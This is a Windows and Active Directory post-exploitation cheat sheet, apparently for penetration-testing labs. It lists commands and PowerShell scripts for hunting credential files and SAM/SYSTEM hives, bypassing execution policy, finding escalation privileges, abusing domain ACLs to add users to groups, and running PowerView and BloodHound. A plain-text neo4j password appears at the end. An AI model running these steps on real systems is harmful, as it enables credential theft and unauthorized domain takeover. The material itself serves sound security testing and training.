Windows

NOTE: Things to enumerate first on a new foothold:

  • Username and hostname

  • Group memberships of the current user

  • Existing users and groups

  • Operating system, version and architecture

  • Network information

  • Installed applications

  • Running processes

Interesting Directories

C:\

# Custom folders
C:\Scripts\
C:\Tools\
C:\Backups\

# To look for the SAM and SYSTEM registry hives (locked by the kernel while Windows runs: look for copies in RegBack\ or backup folders, or dump them with admin rights)
C:\Windows\System32\config\

# To look for scheduled tasks
C:\Windows\System32\Tasks\

# To look for programs that run on start up (Group Policy startup scripts)
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup\

# Web Servers folders
C:\xampp\
C:\inetpub\wwwroot\

Interesting Files

Command Prompt

where /r C:\Users *.txt *.pdf *.xls *.xlsx *.doc *.docx *.ini *.log *.ps1 *.kdbx

where /r C:\ *.uac *.dll

where /r C:\ SAM SYSTEM

where /r C:\ local.txt proof.txt

# Display ALL files (including hidden and system files), recursively
dir /a /s

Powershell

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.ini,*.log,*.ps1,*.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include *.uac,*.dll -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue

# Display ALL files (including hidden and system files), recursively; ls and dir are aliases of Get-ChildItem
Get-ChildItem -Force -Recurse
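As an added example (not from the original page), the following PowerShell combines the Get-ChildItem sweeps above with a Select-String pass that greps the text files for credential-looking lines. The roots are assumed to match the custom folders listed on this page, and the regex is a starting point, not a complete one; adjust both to the target.

```powershell
# Added example, not part of the original page. Assumptions: the roots below match the
# custom and web folders listed on this page; the credential regex is deliberately simple.
function Find-InterestingFiles {
    param(
        [string[]]$Roots = @('C:\Users', 'C:\Scripts', 'C:\Tools', 'C:\Backups',
                             'C:\inetpub\wwwroot', 'C:\xampp'),
        [string[]]$Include = @('*.txt', '*.pdf', '*.xls', '*.xlsx', '*.doc', '*.docx',
                               '*.ini', '*.log', '*.ps1', '*.kdbx', '*.config', '*.xml')
    )
    # -Force includes hidden files; missing roots and access-denied folders are skipped silently
    Get-ChildItem -Path $Roots -Include $Include -File -Recurse -Force -ErrorAction SilentlyContinue |
        Sort-Object LastWriteTime -Descending
}

function Find-CredentialStrings {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [System.IO.FileInfo]$File,
        [string]$Pattern = '(pass(word|wd)?|pwd|secret|api[_-]?key|connectionstring)\s*[=:]'
    )
    begin { $binary = '.pdf', '.xls', '.xlsx', '.doc', '.docx', '.kdbx' }
    process {
        # Office, PDF and KeePass files are binary; grepping them only produces noise
        if ($binary -contains $File.Extension.ToLower()) { return }
        $File | Select-String -Pattern $Pattern -ErrorAction SilentlyContinue |
            Select-Object Path, LineNumber, Line
    }
}

# Usage: list the candidates newest-first, then grep the text ones for credentials
$candidates = Find-InterestingFiles
$candidates | Select-Object FullName, Length, LastWriteTime | Format-Table -AutoSize
$candidates | Find-CredentialStrings | Format-Table -AutoSize -Wrap
```

Binary document formats are skipped in the grep pass on purpose: open those by hand (or with a KeePass cracker for .kdbx) rather than pattern-matching their bytes.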

User Permissions

User Information

whoami /all

NOTE: The above command combines the output of the following three:

whoami /user
whoami /priv
whoami /groups

Page links to different permission attacks (?)

User Enumeration

Get all users on the current machine (add /domain to query the domain controller instead)

net user [/domain]
Get-LocalUser

Get information on a particular user

net user <Username> [/domain]

Get groups (net group needs /domain and only lists domain groups; Get-LocalGroup lists local groups)

net group [/domain]
Get-LocalGroup

Get members of a particular local group

Get-LocalGroupMember "<Group Name>"

Get information on a particular group in the domain

net group <Group Name> /domain

Get local administrators

net localgroup administrators

Get SMB shares exported by this machine

net share

Get the password policy (minimum length, lockout threshold and duration)

net accounts
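As an added example (not from the original page) covering the User Permissions and User Enumeration sections above, this PowerShell parses whoami /priv for the privileges that commonly lead to escalation and lists every local group with its members, marking the groups the current token holds. The list of "dangerous" privileges is an assumption of this example, not something the page states.

```powershell
# Added example, not part of the original page. Built-in tools only; the privilege list
# is an assumption based on well-known token-abuse and backup/restore escalation paths.
function Get-DangerousPrivileges {
    $interesting = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege',
                   'SeBackupPrivilege', 'SeRestorePrivilege', 'SeDebugPrivilege',
                   'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeManageVolumePrivilege'
    # whoami /priv /fo csv gives a parseable table; a Disabled privilege is still held and can be enabled
    whoami /priv /fo csv | ConvertFrom-Csv |
        Where-Object { $interesting -contains $_.'Privilege Name' } |
        Select-Object 'Privilege Name', State
}

function Get-LocalGroupMembership {
    $me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    foreach ($g in Get-LocalGroup) {
        $members = @(Get-LocalGroupMember -Group $g.Name -ErrorAction SilentlyContinue)
        [pscustomobject]@{
            Group   = $g.Name
            InToken = $mySids -contains $g.SID.Value   # held directly or through domain group nesting
            Members = ($members | ForEach-Object { $_.Name }) -join ', '
        }
    }
}

Get-DangerousPrivileges | Format-Table -AutoSize
Get-LocalGroupMembership | Sort-Object InToken -Descending | Format-Table -AutoSize -Wrap
```

The InToken column comes from the logon token rather than from the group listing, so it also catches membership inherited through nested domain groups, which net localgroup shows only by the group's name.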

System Enumeration

Get important information

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"

Get port information

netstat -ano

Get network information

ipconfig /all

Determine whether the current shell is cmd.exe or PowerShell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Installed programs (Wow6432Node holds 32-bit installs on 64-bit Windows, the other key 64-bit ones)

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
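As an added example (not from the original page), this PowerShell merges the two registry queries above with the per-user HKCU Uninstall key and flags software installed outside Program Files and Windows. The NonStandard heuristic is an addition of this example: custom install folders are frequent candidates for weak directory ACLs.

```powershell
# Added example, not part of the original page. The HKCU key and the NonStandard
# heuristic (install path outside Program Files / Windows) are additions to the page's queries.
function Get-InstalledPrograms {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',             # 64-bit installs
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*', # 32-bit installs on 64-bit Windows
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'              # per-user installs
    )
    Get-ItemProperty -Path $keys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        ForEach-Object {
            $loc = [string]$_.InstallLocation
            [pscustomobject]@{
                Name        = $_.DisplayName
                Version     = $_.DisplayVersion
                Publisher   = $_.Publisher
                Location    = $loc
                # Software under a custom folder often carries weak directory ACLs
                NonStandard = ($loc -ne '' -and $loc -notmatch '^[A-Za-z]:\\(Program Files( \(x86\))?|Windows)\\')
            }
        } | Sort-Object Name, Version -Unique
}

Get-InstalledPrograms | Format-Table Name, Version, Publisher -AutoSize
# Candidates to inspect with icacls: installed somewhere other than Program Files / Windows
Get-InstalledPrograms | Where-Object NonStandard | Format-Table Name, Location -AutoSize
```

Entries with an empty InstallLocation are kept in the first listing (the version is still useful for exploit research) but are never flagged as NonStandard, since there is no path to check.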

Web Root Directory

dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<Directory Name>\xampp\htdocs

NOTE: Indicators of a web root directory:

  • .htaccess

  • public_html

  • www

  • htdocs

  • httpdocs

Get History

Get-History only covers the current session; the PSReadLine file (printed by the second command, normally ConsoleHost_history.txt under the user's AppData) persists across sessions and is worth reading for every user profile you can access.

Get-History
(Get-PSReadlineOption).HistorySavePath

PowerView

NOTE: Remember to run the following

  • powershell -ep bypass

  • Import-Module .\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered result

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered result

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Enumerate Computers in the Domain

Get-NetComputer

To get filtered result

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for administrative rights of the current user on other computers in the domain

Find-LocalAdminAccess

To look for logged-on sessions on a target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If the call returns nothing or access is denied, check the permissions first.

Get-NetSession calls NetSessionEnum, whose permissions are the security descriptor stored in the SrvsvcSessionInfo value of the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity. Recent builds (Windows 10 1709 and Server 2019 onwards) no longer grant ordinary authenticated users this right by default, so expect empty results against current targets unless the descriptor has been loosened.

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: The remote machine must have the Remote Registry service enabled (PsLoggedon reads HKEY_USERS over it to find locally logged-on users; share sessions still come from NetSessionEnum)

To check the permissions on a registry key

Get-Acl -Path <Registry Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
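Get-Acl on the key reports who may read or modify the key itself; the right that NetSessionEnum actually checks is the self-relative security descriptor stored inside the SrvsvcSessionInfo value. As an added example (not from the original page), this PowerShell decodes that value into its ACEs and SDDL, locally or over Remote Registry (which assumes that service is running on the target).

```powershell
# Added example, not part of the original page. Decodes the REG_BINARY security descriptor
# in SrvsvcSessionInfo, which is what NetSessionEnum (and so Get-NetSession) is checked against.
function Get-SrvsvcSessionInfoAcl {
    param([string]$ComputerName)   # omit for the local machine
    $subKey = 'SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
    $hive = if ($ComputerName) {
        # Remote Registry service must be running on the target
        [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $ComputerName)
    } else {
        [Microsoft.Win32.Registry]::LocalMachine
    }
    $bytes = $hive.OpenSubKey($subKey).GetValue('SrvsvcSessionInfo')
    if (-not $bytes) { throw "SrvsvcSessionInfo not readable on '$ComputerName'" }

    # The value is a self-relative security descriptor; parse it from offset 0
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0

    $aces = foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid.Value }   # unresolvable SID: keep the raw value
        [pscustomobject]@{
            Principal  = $name
            SID        = $sid.Value
            Type       = $ace.AceQualifier          # AccessAllowed / AccessDenied
            AccessMask = '0x{0:X}' -f $ace.AccessMask
        }
    }
    [pscustomobject]@{
        Computer = if ($ComputerName) { $ComputerName } else { $env:COMPUTERNAME }
        Sddl     = $sd.GetSddlForm('All')
        Aces     = $aces
    }
}

# Usage: no Authenticated Users (S-1-5-11) entry means Get-NetSession as a plain domain user returns nothing
$r = Get-SrvsvcSessionInfoAcl   # add -ComputerName <Computer Name> for a remote host
$r.Sddl
$r.Aces | Format-Table -AutoSize
```

Reading the value locally needs no special rights; reading it remotely requires both Remote Registry and read access to the key, so a denied remote read is itself a finding about the target's hardening.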

To check the ACL on a user object in Active Directory (PowerView; -SamAccountName is the old parameter name, current PowerView builds use -Identity)

Get-ObjectAcl -SamAccountName <Username> -ResolveGUIDs | fl

To enumerate Service Principal Name

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting (non-default) ACLs across the domain, dropping the noisy DnsAdmins entries

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -notmatch "DnsAdmins"} | ft

To list the ACEs that grant GenericAll on a group (SecurityIdentifier is the principal holding the right; resolve it with Convert-SidToName)

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To list the ACEs that grant GenericWrite on a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SID to Name in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert SID to Name individually

Convert-SidToName "<SID>"
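As an added example (not from the original page) tying the ACE and SID steps above together, this PowerShell pulls the ACEs on a group, keeps the abusable rights, resolves each SID to a name and marks those held by the current token. It assumes PowerView.ps1 is already imported and uses the same function names as this page (Get-ObjectAcl, Convert-SidToName). WriteDacl and WriteOwner are added to the page's GenericAll and GenericWrite, since either lets the holder grant themselves full control of the object.

```powershell
# Added example, not part of the original page. Assumes PowerView.ps1 is loaded
# (Import-Module .\PowerView.ps1) and a domain-joined context for the current user.
function Find-AbusableGroupAces {
    param(
        [Parameter(Mandatory)] [string]$GroupName,
        # GenericAll/GenericWrite as on this page; WriteDacl/WriteOwner added, also abusable
        [string]$RightsPattern = 'GenericAll|GenericWrite|WriteDacl|WriteOwner'
    )
    $me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

    Get-ObjectAcl -Identity $GroupName -ResolveGUIDs |
        Where-Object { $_.AceQualifier -eq 'AccessAllowed' -and $_.ActiveDirectoryRights -match $RightsPattern } |
        ForEach-Object {
            $sid = $_.SecurityIdentifier.Value
            [pscustomobject]@{
                Group     = $GroupName
                Principal = Convert-SidToName $sid
                SID       = $sid
                Rights    = $_.ActiveDirectoryRights
                Inherited = $_.IsInherited
                # true => net group "<Group Name>" <user> /add /domain should succeed for the current user
                HeldByMe  = $mySids -contains $sid
            }
        }
}

# Usage: single group, then every group in the domain filtered to what the current user can abuse
Find-AbusableGroupAces -GroupName 'Domain Admins' | Format-Table -AutoSize
Get-NetGroup | ForEach-Object { Find-AbusableGroupAces -GroupName $_.samaccountname } |
    Where-Object HeldByMe | Format-Table -AutoSize
```

The domain-wide loop issues one LDAP query per group plus one SID lookup per matching ACE, so on a large domain run it once and keep the output rather than re-running it per question.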

Add a user to a domain group (succeeds when the current user holds GenericAll, GenericWrite or WriteProperty on the group, as found above)

net group "<Group Name>" <Username> /add /domain

To enumerate all shares on Domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

To enumerate Group Policy (Get-GPO and Get-GPPermission come from the GroupPolicy RSAT module, not PowerView)

Get-GPO -Name "<Group Policy Name>"

EXAMPLE:

Get-GPO -Name "Default Domain Policy"

To enumerate a user's permissions on a group policy (the GUID is the Id field returned by Get-GPO)

Get-GPPermission -Guid <GPO GUID> -TargetType User -TargetName <Username>

NOTE: Interesting only if the returned permission includes ModifySecurity or full control (GpoEditDeleteModifySecurity) rather than only read/apply rights

BloodHound

To import the collector (Bloodhound.ps1 here is the SharpHound PowerShell collector, which provides Invoke-BloodHound)

Import-Module C:\Tools\Bloodhound.ps1

To begin collecting with BloodHound (writes a zip archive into the output directory; transfer it to the attacking machine and import it in the BloodHound GUI)

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474 (the neo4j web console; the BloodHound GUI connects to the bolt port 7687 with the same credentials)

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161
